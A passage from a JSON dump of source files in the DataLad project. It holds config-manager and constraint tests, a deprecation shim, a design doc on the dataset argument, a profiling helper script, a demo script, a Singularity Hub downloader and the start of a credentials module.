'config',\n ds2.config._stores['git']['files'])\n assert_not_in(ds1.pathobj / '.datalad' / 'config',\n ds2.config._stores['branch']['files'])\n # these are the right ones\n assert_in(ds2.pathobj / '.git' / 'config',\n ds2.config._stores['git']['files'])\n assert_in(ds2.pathobj / '.datalad' / 'config',\n ds2.config._stores['branch']['files'])\n\n\n@with_tempfile()\ndef test_no_local_write_if_no_dataset(path=None):\n Dataset(path).create()\n with chpwd(path):\n cfg = ConfigManager()\n with assert_raises(CommandError):\n cfg.set('a.b.c', 'd', scope='local')\n\n\n@with_tempfile\ndef test_dataset_local_mode(path=None):\n ds = create(path)\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', ds.config)\n # from .datalad/config\n assert_in('datalad.dataset.id', ds.config)\n # from .git/config\n assert_in('annex.version', ds.config)\n # now check that dataset-local mode doesn't have the global piece\n cfg = ConfigManager(ds, source='branch-local')\n assert_not_in('user.name', cfg)\n assert_in('datalad.dataset.id', cfg)\n assert_in('annex.version', cfg)\n\n\n# https://github.com/datalad/datalad/issues/4071\n@with_tempfile\ndef test_dataset_systemglobal_mode(path=None):\n ds = create(path)\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', ds.config)\n # from .datalad/config\n assert_in('datalad.dataset.id', ds.config)\n # from .git/config\n assert_in('annex.version', ds.config)\n with chpwd(path):\n # now check that no config from a random dataset at PWD is picked up\n # if not dataset instance was provided\n cfg = ConfigManager(dataset=None, source='any')\n assert_in('user.name', cfg)\n assert_not_in('datalad.dataset.id', cfg)\n assert_not_in('annex.version', cfg)\n\n\ndef test_global_config():\n\n # from within tests, global config should be read from faked $HOME (see\n # setup_package) or from GIT_CONFIG_GLOBAL\n\n if 'GIT_CONFIG_GLOBAL' in os.environ.keys():\n glb_cfg_file = Path(os.environ.get('GIT_CONFIG_GLOBAL'))\n else:\n glb_cfg_file = Path(os.path.expanduser('~')) / '.gitconfig'\n assert any(glb_cfg_file.samefile(Path(p)) for p in dl_cfg._stores['git']['files'])\n assert_equal(dl_cfg.get(\"user.name\"), \"DataLad Tester\")\n assert_equal(dl_cfg.get(\"user.email\"), \"[email protected]\")\n\n\[email protected](r\"ignore: status\\(report_filetype=\\) no longer supported\")\n@with_tempfile()\n@with_tempfile()\ndef test_bare(src=None, path=None):\n # create a proper datalad dataset with all bells and whistles\n ds = Dataset(src).create()\n dlconfig_sha = ds.repo.call_git(['rev-parse', 'HEAD:.datalad/config']).strip()\n # can we handle a bare repo version of it?\n gr = AnnexRepo.clone(\n src, path, clone_options=['--bare', '-b', DEFAULT_BRANCH])\n # we had to specifically checkout the standard branch, because on crippled\n # FS, HEAD will point to an adjusted branch by default, and the test logic\n # below does not account for this case.\n # this should just make sure the bare repo has the expected setup,\n # but it should still be bare. Let's check that to be sure\n assert_true(gr.bare)\n # do we read the correct local config?\n assert_in(gr.pathobj / 'config', gr.config._stores['git']['files'])\n # do we pick up the default branch config too?\n assert_in('blob:HEAD:.datalad/config',\n gr.config._stores['branch']['files'])\n # and track its reload stamp via its file shasum\n assert_equal(\n dlconfig_sha,\n gr.config._stores['branch']['stats']['blob:HEAD:.datalad/config'])\n # check that we can pick up the dsid from the commit branch config\n assert_equal(ds.id, gr.config.get('datalad.dataset.id'))\n # and it is coming from the correct source\n assert_equal(\n ds.id,\n gr.config.get_from_source('branch', 'datalad.dataset.id'))\n assert_equal(\n None,\n gr.config.get_from_source('local', 'datalad.dataset.id'))\n # any sensible (and also our CI) test environment(s) should have this\n assert_in('user.name', gr.config)\n # not set something that wasn't there\n obscure_key = 'sec.reallyobscurename!@@.key'\n assert_not_in(obscure_key, gr.config)\n # to the local config, which is easily accessible\n gr.config.set(obscure_key, 'myvalue', scope='local')\n assert_equal(gr.config.get(obscure_key), 'myvalue')\n # now make sure the config is where we think it is\n assert_in(obscure_key.split('.')[1], (gr.pathobj / 'config').read_text())\n # update committed config and check update\n old_id = ds.id\n ds.config.set('datalad.dataset.id', 'surprise!', scope='branch')\n ds.save()\n # fetch into default branch (like `update`, but for bare-repos)\n gr.call_git([\n 'fetch', f'{DEFAULT_REMOTE}', f'{DEFAULT_BRANCH}:{DEFAULT_BRANCH}'])\n # without a reload, no state change, like with non-bare repos\n assert_equal(\n old_id,\n gr.config.get_from_source('branch', 'datalad.dataset.id'))\n # a non-forced reload() must be enough, because state change\n # detection kicks in\n gr.config.reload()\n assert_equal('surprise!', gr.config.get('datalad.dataset.id'))\n\n\n@with_tempfile()\ndef test_write_config_section(path=None):\n # can we handle a bare repo?\n gr = GitRepo(path, create=True, bare=True)\n\n obscure = \"ds-; &%b5{}# some % \"\n # test cases\n # first 3 args are write_config_section() parameters\n # 4th arg is a list with key/value pairs that should end up in a\n # ConfigManager after a reload\n testcfg = [\n ('submodule', 'sub', dict(active='true', url='http://example.com'), [\n ('submodule.sub.active', 'true'),\n ('submodule.sub.url', 'http://example.com'),\n ]),\n ('submodule', 'sub\"quote', {\"a-b\": '\"quoted\"', 'c': 'with\"quote'}, [\n ('submodule.sub\"quote.a-b', '\"quoted\"'),\n ('submodule.sub\"quote.c', 'with\"quote'),\n ]),\n ('short', ' s p a c e ', {\"a123\": ' space all over '}, [\n ('short. s p a c e .a123', ' space all over '),\n ]),\n ('submodule', obscure, {\n 'path': obscure,\n 'url': f\"./{obscure}\"}, [\n (f\"submodule.{obscure}.path\", obscure),\n (f\"submodule.{obscure}.url\", f\"./{obscure}\"),\n ]),\n ]\n\n for tc in testcfg:\n # using append mode to provoke potential interference by\n # successive calls\n with (gr.pathobj / 'config').open('a') as fobj:\n write_config_section(fobj, tc[0], tc[1], tc[2])\n gr.config.reload()\n for testcase in tc[3]:\n assert_in(testcase[0], gr.config)\n assert_equal(testcase[1], gr.config[testcase[0]])\n\n\n@with_tempfile()\ndef test_external_modification(path=None):\n from datalad.cmd import WitlessRunner as Runner\n runner = Runner(cwd=path)\n repo = GitRepo(path, create=True)\n config = repo.config\n\n key = 'sec.sub.key'\n assert_not_in(key, config)\n config.set(key, '1', scope='local')\n assert_equal(config[key], '1')\n\n # we pick up the case where we modified so size changed\n runner.run(['git', 'config', '--local', '--replace-all', key, '10'])\n # unfortunately we do not react for .get unless reload. But here\n # we will test if reload is correctly decides to reload without force\n config.reload()\n assert_equal(config[key], '10')\n\n # and no size change\n runner.run(['git', 'config', '--local', '--replace-all', key, '11'])\n config.reload()\n assert_equal(config[key], '11')\n\n\n# TODO: remove test along with the removal of deprecated 'where'\[email protected](\"ignore: 'where' is deprecated\")\[email protected](\"ignore: 'where=\\\"dataset\\\"' is deprecated\")\ndef test_where_to_scope():\n\n @_where_to_scope\n def f(scope=None):\n return scope\n\n # others aren't affected but we map where to scope\n assert_equal(f(where='local'), 'local')\n assert_equal(f(scope='local'), 'local')\n # we do mapping to 'branch' for where\n assert_equal(f(where='dataset'), 'branch')\n # but not for 'scope' -- since that is the target new name, we pass as is\n assert_equal(f(scope='dataset'), 'dataset')\n # we do not allow both\n assert_raises(ValueError, f, where='local', scope='local')\n\n\ndef test_cross_cfgman_update(tmp_path):\n myuniqcfg = 'datalad.tester.unique.updatecfg'\n myuniqcfg_value = 'some'\n myuniqcfg_value2 = 'someother'\n assert myuniqcfg not in dl_cfg\n ds = Dataset(tmp_path)\n assert not ds.is_installed()\n # there is no dataset to write to, it rejects it rightfully\n # it is a bit versatile in its exception behavior\n # https://github.com/datalad/datalad/issues/7300\n with pytest.raises((ValueError, CommandError)):\n ds.config.set(myuniqcfg, myuniqcfg_value, scope='local')\n # but we can write to global scope\n ds.config.set(myuniqcfg, myuniqcfg_value, scope='global')\n # it can retrieve the update immediately, because set(reload=)\n # defaults to True\n assert ds.config.get(myuniqcfg) == myuniqcfg_value\n # given that we modified the global scope, we expect this to\n # be reflected in the global cfgman too\n assert dl_cfg.get(myuniqcfg) == myuniqcfg_value\n\n # now we create a repo\n ds.create(result_renderer='disabled')\n # we had written to global scope, we expect the probe item\n # to stick around, even though the cfgman instance is replaced\n assert ds.config.get(myuniqcfg) == myuniqcfg_value\n # now we replace the value via this new cfgman\n ds.config.set(myuniqcfg, myuniqcfg_value2, scope='global')\n # and again expect the global instance to catch up with it\n assert dl_cfg.get(myuniqcfg) == myuniqcfg_value2\n" }, { "alpha_fraction": 0.7426470518112183, "alphanum_fraction": 0.7426470518112183, "avg_line_length": 29.22222137451172, "blob_id": "2165d2802567eef9d322908a7d9be6c6022af40b", "content_id": "4e0100caefcdb79b86ea0ea69dea042befced938", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "permissive", "max_line_length": 79, "num_lines": 9, "path": "/datalad/plugin/check_dates.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.check_dates is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.check_dates instead.\",\n DeprecationWarning)\n\nfrom datalad.local.check_dates import *\n" }, { "alpha_fraction": 0.7219662070274353, "alphanum_fraction": 0.7238863110542297, "avg_line_length": 38.45454406738281, "blob_id": "10e9897e219c0a1560c8e7a12b5e28e1aef50b71", "content_id": "b9bbfc9c881e7d634052c1e1fe47480eb85326d2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2604, "license_type": "permissive", "max_line_length": 150, "num_lines": 66, "path": "/docs/source/design/dataset_argument.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_dataset_argument:\n\n********************\n``dataset`` argument\n********************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nAll commands which operate on datasets have a ``dataset`` argument (``-d`` or\n``--dataset`` for the :term:`CLI`) to identify a single dataset as the\ncontext of an operation.\nIf ``--dataset`` argument is not provided, the context of an operation is command-specific.\nFor example, `clone` command will consider the :term:`dataset` which is being cloned to be the context.\nBut typically, a dataset which current working directory belongs to is the context of an operation.\nIn the latter case, if operation (e.g., `get`) does not find a dataset in current working directory, operation fails with an ``NoDatasetFound`` error.\n\n\nImpact on relative path resolution\n==================================\n\nWith one exception, the nature of a provided ``dataset`` argument does **not**\nimpact the interpretation of relative paths. Relative paths are always considered\nto be relative to the process working directory.\n\nThe one exception to this rule is passing a ``Dataset`` object instance as\n``dataset`` argument value in the Python API. In this, and only this, case, a\nrelative path is interpreted as relative to the root of the respective dataset.\n\n\nSpecial values\n==============\n\nThere are some pre-defined \"shortcut\" values for dataset arguments:\n\n``^``\n Represents to the topmost superdataset that contains the dataset the current\n directory is part of.\n``^.``\n Represents the root directory of the dataset the current directory is part of.\n``///``\n Represents the \"default\" dataset located under `$HOME/datalad/`.\n\n\nUse cases\n=========\n\nSave modification in superdataset hierarchy\n-------------------------------------------\n\nSometimes it is convenient to work only in the context of a subdataset.\nExecuting a ``datalad save <subdataset content>`` will record changes to the\nsubdataset, but will leave existing superdatasets dirty, as the subdataset\nstate change will not be saved there. Using the ``dataset`` argument it is\npossible to redefine the scope of the save operation. For example::\n\n datalad save -d^ <subdataset content>\n\nwill perform the exact same save operation in the subdataset, but additionally\nsave all subdataset state changes in all superdatasets until the root of a\ndataset hierarchy. Except for the specification of the dataset scope there is\nno need to adjust path arguments or change the working directory.\n" }, { "alpha_fraction": 0.6087902784347534, "alphanum_fraction": 0.6166231632232666, "avg_line_length": 21.320388793945312, "blob_id": "837948888a79058970a90d56642f84f8f8a26b2e", "content_id": "0ac19d1abd48b320f7f9f95d9d2bcc60b91d4716", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2298, "license_type": "permissive", "max_line_length": 122, "num_lines": 103, "path": "/tools/profile_python", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# A little helper to profile Python scripts and directly python code\n#\n#\n\nset -ue\n\nmktemp_() {\n mktemp \"${TMPDIR:-/tmp}/profile_pythonXXXXXX\"\n}\n\nhelp() {\n cat << EOF\nHelper to create profile graphs for Python scripts and code (via -c argument)\n\n$0 [--help] [--copyq] [-p|--prefix PREFIX] [-c \"python code\"|script] [ARGS]\n\nIf copyq is available, will also copy to its clipboard while you are enjoying\nthe view.\n\nIf script file is not found, will try to locate it in the PATH, and proceed with\nit if found.\nEOF\n exit 0\n}\n\n[ \"$#\" = 0 ] && help\n\nprefix=\ncopyq=\n\nwhile [[ \"$#\" -gt 0 ]]; do case \"$1\" in\n -h|--help)\n help;;\n -c)\n echo \"We are passed Python statement to profile.\"\n shift\n prefix=$(mktemp_)\n pyfile=\"$prefix.py\"\n echo \"$1\" >| \"$pyfile\"\n shift\n #echo \"Temporary script $pyfile will be removed after\"\n #trap \"rm -f ${prefix}*\" 0\n break\n ;;\n -p|--prefix)\n shift\n prefix=\"$1\"\n echo \"Prefix $prefix\"\n shift\n ;;\n --copyq)\n shift\n hash copyq 2>/dev/null || { echo \"No copyq found\"; exit 1; }\n copyq=yes\n ;;\n *) # must be a script\n pyfile=\"$1\"\n shift\n break\n ;;\nesac; done\n\n\nif [ -z \"$prefix\" ]; then\n prefix=$(mktemp_ profile_pythonXXXXXX)\nfi\n\npstatsfile=\"$prefix.pstats\"\npngfile=\"$prefix.png\"\nstatsfile=\"$prefix.stats\"\n\nif [ ! -e \"$pyfile\" ]; then\n echo \"File $pyfile is not found. Is it a script in the PATH?\"\n pyfile_=$(command -v \"$pyfile\" 2>/dev/null)\n if [ -n \"$pyfile_\" ]; then\n echo \" Found $pyfile_ which we will use instead\"\n pyfile=\"$pyfile_\"\n else\n echo \" No file found. Exiting\"\n exit 1\n fi\nfi\n\necho \"Profiling $pyfile\"\npython -m cProfile -s name -o \"$pstatsfile\" \"$pyfile\" \"$@\" || echo \"E: Exited with $?\"\ngprof2dot -f pstats \"$pstatsfile\" | dot -Tpng -o \"$pngfile\"\n\necho \"Stats file $statsfile\"\npython -c \"import pstats; pstats.Stats('$pstatsfile').sort_stats(pstats.SortKey.CUMULATIVE).print_stats()\" >| \"$statsfile\"\nhead -n 20 \"$statsfile\"\n\necho \"Showing $pngfile\"\nxdg-open \"$pngfile\" &\n\nif [ -n \"$copyq\" ]; then\n echo \"Copying $statsfile to CopyQ clipboard\"\n copyq write text/plain - < \"$statsfile\" && copyq select 0\n\n echo \"Copying $pngfile to CopyQ clipboard\"\n copyq write image/png - < \"$pngfile\" && copyq select 0\nfi" }, { "alpha_fraction": 0.7653471231460571, "alphanum_fraction": 0.7670682668685913, "avg_line_length": 61.25, "blob_id": "1dccc8a6186cf39815130a078931215cfb4b4f4f", "content_id": "57bf6d7adcf575133dd089762acaa6c0390b5b8b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1743, "license_type": "permissive", "max_line_length": 256, "num_lines": 28, "path": "/docs/casts/track_data_from_webpage.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "say \"With a few lines DataLad is set up to track data posted on a website, and obtain changes made in the future...\"\n\nsay \"The website http://www.fmri-data-analysis.org/code provides code and data file for examples in a text book.\"\nsay \"We will set up a dataset that DataLad uses to track the content linked from this webpage\"\nsay \"Let's create the dataset, and configure it to track any text file directly in Git. This will make it very convenient to see how source code changed over time.\"\nrun \"datalad create --text-no-annex demo\"\nrun \"cd demo\"\n\nsay \"DataLad's crawler functionality is used to monitor the webpage. It's configuration is stored in the dataset itself.\"\nsay \"The crawler comes with a bunch of configuration templates. Here we are using one that extract all URLs that match a particular pattern, and obtains the linked data. In case of this webpage, all URLs of interest on that page seems to have 'd=1' suffix\"\nrun \"datalad crawl-init --save --template=simple_with_archives url=http://www.fmri-data-analysis.org/code 'a_href_match_=.*d=1$'\"\nrun \"datalad diff --revision @~1\"\nrun \"cat .datalad/crawl/crawl.cfg\"\n\nsay \"With this configuration in place, we can ask DataLad to crawl the webpage.\"\nrun \"datalad crawl\"\n\nsay \"All files have been obtained and are ready to use. Here is what DataLad recorded for this update\"\nrun \"git show @ -s\"\n\nsay \"Any file from the webpage is available locally.\"\nrun \"ls\"\n\nsay \"The webpage can be queried for potential updates at any time by re-running the 'crawl' command.\"\nrun \"datalad crawl\"\n\nsay \"Files can be added, or removed from this dataset without impairing the ability to get updates from the webpage. DataLad keeps the necessary information in dedicated Git branches.\"\nrun \"git branch\"\n" }, { "alpha_fraction": 0.5759630799293518, "alphanum_fraction": 0.6018719673156738, "avg_line_length": 30.639484405517578, "blob_id": "1b751d6791a0ec34ae08ff7b9950b66e3dc6542a", "content_id": "0881547fdb657e070fe412842274736c8bc4a939", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7372, "license_type": "permissive", "max_line_length": 86, "num_lines": 233, "path": "/datalad/tests/test_constraints.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the DataLad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n'''Unit tests for basic constraints functionality.'''\n\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom ..support import constraints as ct\n\n\ndef test_int():\n c = ct.EnsureInt()\n # this should always work\n assert_equal(c(7), 7)\n assert_equal(c(7.0), 7)\n assert_equal(c('7'), 7)\n assert_equal(c([7, 3]), [7, 3])\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c([3, 'fail']))\n # this will also fail\n assert_raises(ValueError, lambda: c('17.0'))\n assert_equal(c.short_description(), 'int')\n\n\ndef test_float():\n c = ct.EnsureFloat()\n # this should always work\n assert_equal(c(7.0), 7.0)\n assert_equal(c(7), 7.0)\n assert_equal(c('7'), 7.0)\n assert_equal(c([7.0, '3.0']), [7.0, 3.0])\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c([3.0, 'fail']))\n\n\ndef test_bool():\n c = ct.EnsureBool()\n # this should always work\n assert_equal(c(True), True)\n assert_equal(c(False), False)\n # all that resuls in True\n assert_equal(c('True'), True)\n assert_equal(c('true'), True)\n assert_equal(c('1'), True)\n assert_equal(c('yes'), True)\n assert_equal(c('on'), True)\n assert_equal(c('enable'), True)\n # all that resuls in False\n assert_equal(c('false'), False)\n assert_equal(c('False'), False)\n assert_equal(c('0'), False)\n assert_equal(c('no'), False)\n assert_equal(c('off'), False)\n assert_equal(c('disable'), False)\n # this should always fail\n assert_raises(ValueError, c, 0)\n assert_raises(ValueError, c, 1)\n\n\ndef test_str():\n c = ct.EnsureStr()\n # this should always work\n assert_equal(c('hello'), 'hello')\n assert_equal(c('7.0'), '7.0')\n # this should always fail\n assert_raises(ValueError, lambda: c(['ab']))\n assert_raises(ValueError, lambda: c(['a', 'b']))\n assert_raises(ValueError, lambda: c(('a', 'b')))\n # no automatic conversion attempted\n assert_raises(ValueError, lambda: c(7.0))\n assert_equal(c.short_description(), 'str')\n\ndef test_str_min_len():\n c = ct.EnsureStr(min_len=1)\n assert_equal(c('hello'), 'hello')\n assert_equal(c('h'), 'h')\n assert_raises(ValueError, c, '')\n\n c = ct.EnsureStr(min_len=2)\n assert_equal(c('hello'), 'hello')\n assert_raises(ValueError, c, 'h')\n\n\ndef test_none():\n c = ct.EnsureNone()\n # this should always work\n assert_equal(c(None), None)\n # instance of NoneDeprecated is also None\n assert_equal(c(ct.NoneDeprecated), None)\n # this should always fail\n assert_raises(ValueError, lambda: c('None'))\n assert_raises(ValueError, lambda: c([]))\n\n\ndef test_callable():\n c = ct.EnsureCallable()\n # this should always work\n assert_equal(c(range), range)\n assert_raises(ValueError, c, 'range')\n\n\ndef test_choice():\n c = ct.EnsureChoice('choice1', 'choice2', None)\n # this should always work\n assert_equal(c('choice1'), 'choice1')\n assert_equal(c(None), None)\n # this should always fail\n assert_raises(ValueError, lambda: c('fail'))\n assert_raises(ValueError, lambda: c('None'))\n\n\ndef test_keychoice():\n c = ct.EnsureKeyChoice(key='some', values=('choice1', 'choice2', None))\n assert_equal(c({'some': 'choice1'}), {'some': 'choice1'})\n assert_equal(c({'some': None}), {'some': None})\n assert_equal(c({'some': None, 'ign': 'ore'}), {'some': None, 'ign': 'ore'})\n assert_raises(ValueError, c, 'fail')\n assert_raises(ValueError, c, 'None')\n assert_raises(ValueError, c, {'nope': 'None'})\n assert_raises(ValueError, c, {'some': 'None'})\n assert_raises(ValueError, c, {'some': ('a', 'b')})\n\n\ndef test_range():\n c = ct.EnsureRange(min=3, max=7)\n # this should always work\n assert_equal(c(3.0), 3.0)\n\n # this should always fail\n assert_raises(ValueError, lambda: c(2.9999999))\n assert_raises(ValueError, lambda: c(77))\n assert_raises(TypeError, lambda: c('fail'))\n assert_raises(TypeError, lambda: c((3, 4)))\n # since no type checks are performed\n assert_raises(TypeError, lambda: c('7'))\n\n # Range doesn't have to be numeric\n c = ct.EnsureRange(min=\"e\", max=\"qqq\")\n assert_equal(c('e'), 'e')\n assert_equal(c('fa'), 'fa')\n assert_equal(c('qq'), 'qq')\n assert_raises(ValueError, c, 'a')\n assert_raises(ValueError, c, 'qqqa')\n\n\ndef test_listof():\n c = ct.EnsureListOf(str)\n assert_equal(c(['a', 'b']), ['a', 'b'])\n assert_equal(c(['a1', 'b2']), ['a1', 'b2'])\n assert_equal(c('a1 b2'), ['a1 b2'])\n\n\ndef test_tupleof():\n c = ct.EnsureTupleOf(str)\n assert_equal(c(('a', 'b')), ('a', 'b'))\n assert_equal(c(('a1', 'b2')), ('a1', 'b2'))\n assert_equal(c('a1 b2'), ('a1 b2',))\n\n\ndef test_constraints():\n # this should always work\n c = ct.Constraints(ct.EnsureFloat())\n assert_equal(c(7.0), 7.0)\n c = ct.Constraints(ct.EnsureFloat(), ct.EnsureRange(min=4.0))\n assert_equal(c(7.0), 7.0)\n # __and__ form\n c = ct.EnsureFloat() & ct.EnsureRange(min=4.0)\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.9)\n c = ct.Constraints(ct.EnsureFloat(), ct.EnsureRange(min=4), ct.EnsureRange(max=9))\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.9)\n assert_raises(ValueError, c, 9.01)\n # __and__ form\n c = ct.EnsureFloat() & ct.EnsureRange(min=4) & ct.EnsureRange(max=9)\n assert_equal(c(7.0), 7.0)\n assert_raises(ValueError, c, 3.99)\n assert_raises(ValueError, c, 9.01)\n # and reordering should not have any effect\n c = ct.Constraints(ct.EnsureRange(max=4), ct.EnsureRange(min=9), ct.EnsureFloat())\n assert_raises(ValueError, c, 3.99)\n assert_raises(ValueError, c, 9.01)\n\n\ndef test_altconstraints():\n # this should always work\n c = ct.AltConstraints(ct.EnsureFloat())\n assert_equal(c(7.0), 7.0)\n c = ct.AltConstraints(ct.EnsureFloat(), ct.EnsureNone())\n assert_equal(c.short_description(), '(float or None)')\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n # __or__ form\n c = ct.EnsureFloat() | ct.EnsureNone()\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n\n # this should always fail\n c = ct.Constraints(ct.EnsureRange(min=0, max=4), ct.EnsureRange(min=9, max=11))\n assert_raises(ValueError, c, 7.0)\n c = ct.EnsureRange(min=0, max=4) | ct.EnsureRange(min=9, max=11)\n assert_equal(c(3.0), 3.0)\n assert_equal(c(9.0), 9.0)\n assert_raises(ValueError, c, 7.0)\n assert_raises(ValueError, c, -1.0)\n\n\ndef test_both():\n # this should always work\n c = ct.AltConstraints(\n ct.Constraints(\n ct.EnsureFloat(),\n ct.EnsureRange(min=7.0, max=44.0)),\n ct.EnsureNone())\n assert_equal(c(7.0), 7.0)\n assert_equal(c(None), None)\n # this should always fail\n assert_raises(ValueError, lambda: c(77.0))\n\ndef test_type_str():\n assert_equal(ct._type_str((str,)), 'str')\n assert_equal(ct._type_str(str), 'str')\n" }, { "alpha_fraction": 0.5881273150444031, "alphanum_fraction": 0.591799259185791, "avg_line_length": 31.68000030517578, "blob_id": "5bbe29af1d9ed94e9d0a3806fbfbdfcba9d89679", "content_id": "8624b869734c9425b60877f93f41f846a31e7cc9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1634, "license_type": "permissive", "max_line_length": 87, "num_lines": 50, "path": "/datalad/downloaders/shub.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Support for resolving Singularity Hub URLs\n\"\"\"\n\nimport json\nfrom logging import getLogger\n\nfrom datalad.dochelpers import borrowkwargs\nfrom datalad.downloaders.http import HTTPDownloader\nfrom datalad.support.exceptions import DownloadError\nfrom datalad.utils import auto_repr\n\nlgr = getLogger(\"datalad.downloaders.shub\")\n\n\n@auto_repr\nclass SHubDownloader(HTTPDownloader):\n \"\"\"Resolve shub:// URLs before handing them off to HTTPDownloader.\n \"\"\"\n\n api_url = \"https://singularity-hub.org/api/container/\"\n\n @borrowkwargs(HTTPDownloader)\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def _resolve_url(self, url):\n if not url.startswith(\"shub://\"):\n return url\n\n info_url = self.api_url + url[7:]\n content = self.fetch(info_url)\n try:\n shub_info = json.loads(content)\n except json.decoder.JSONDecodeError as e:\n raise DownloadError(\n \"Failed to get information from {}\"\n .format(info_url)) from e\n return shub_info[\"image\"]\n\n @borrowkwargs(HTTPDownloader)\n def access(self, method, url, *args, **kwargs):\n return super().access(method, self._resolve_url(url), *args, **kwargs)\n" }, { "alpha_fraction": 0.5983073711395264, "alphanum_fraction": 0.6007757782936096, "avg_line_length": 37.32239532470703, "blob_id": "cb8163276bd3b98a8a29f69a03dcdd364c3ae2e9", "content_id": "bf21a6229604e21281f0f0be31b2dda9b576948b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19851, "license_type": "permissive", "max_line_length": 100, "num_lines": 518, "path": "/datalad/downloaders/credentials.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface information about credentials\n\nProvides minimalistic interface to deal (query, request, store) with most common\ntypes of credentials. To be used by Authenticators\n\"\"\"\n\n__dev_doc__ = \"\"\"\nPossibly useful in the future 3rd part developments\n\nhttps://github.com/omab/python-social-auth\n social authentication/registration mechanism with support for several\n frameworks and auth providers\n\"\"\"\n\nimport time\n\nfrom ..support.exceptions import (\n AccessDeniedError,\n CapturedException,\n)\nfrom ..support.keyring_ import keyring as keyring_\nfrom ..ui import ui\nfrom ..utils import auto_repr\nfrom ..support.network import iso8601_to_epoch\n\nfrom datalad import cfg as dlcfg\nfrom datalad.config import anything2bool\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.local.gitcredential import GitCredentialInterface\n\nfrom logging import getLogger\nlgr = getLogger('datalad.downloaders.credentials')\n\n\n@auto_repr\nclass Credential(object):\n \"\"\"Base class for different types of credentials\n\n Note: While subclasses can define their own `_FIELDS`, they are actually\n assumed to have particular keys by the implementation of (some)\n authenticators. `HTTPRequestsAuthenticator` and its subclasses for example,\n assume `user` and `password` to be valid keys.\n \"\"\"\n\n # Should be defined in a subclass as a dict of fields\n # name -> dict(attributes)\n _FIELDS = None\n _KNOWN_ATTRS = {\n 'hidden', # UI should not display the value\n 'repeat', # UI should repeat entry or not. Set to False to override default logic\n 'optional', # Not mandatory thus not requested if not set\n }\n\n def __init__(self, name, url=None, keyring=None, auth_url=None,\n dataset=None):\n \"\"\"\n Parameters\n ----------\n name : str\n Name of the credential, as it would be identified by in the centralized\n storage of credentials\n url : str, optional\n URL string to point users to where to seek obtaining the credentials\n keyring : a keyring\n An object providing (g|s)et_password. If None, keyring module is used\n as is\n auth_url : str, optional\n URL string this credential is going to be used with. This context\n may be needed to query some credential systems (like git-credential).\n dataset : str, Path or Dataset\n The dataset datalad is operating on with this credential. This may\n be needed for context in order to query local configs.\n \"\"\"\n self.name = name\n self.url = url\n self.set_context(auth_url=auth_url, dataset=dataset)\n self._keyring = keyring or keyring_\n self._prepare()\n\n def _prepare(self):\n \"\"\"Additional house-keeping possibly to be performed in subclasses\n\n Created to avoid all the passing args/kwargs of __init__ all the time\n \"\"\"\n # Basic checks\n for f, fattrs in self._FIELDS.items():\n unknown_attrs = set(fattrs).difference(self._KNOWN_ATTRS)\n if unknown_attrs:\n raise ValueError(\"Unknown attributes %s. Known are: %s\"\n % (unknown_attrs, self._KNOWN_ATTRS))\n\n def _is_field_optional(self, f):\n return 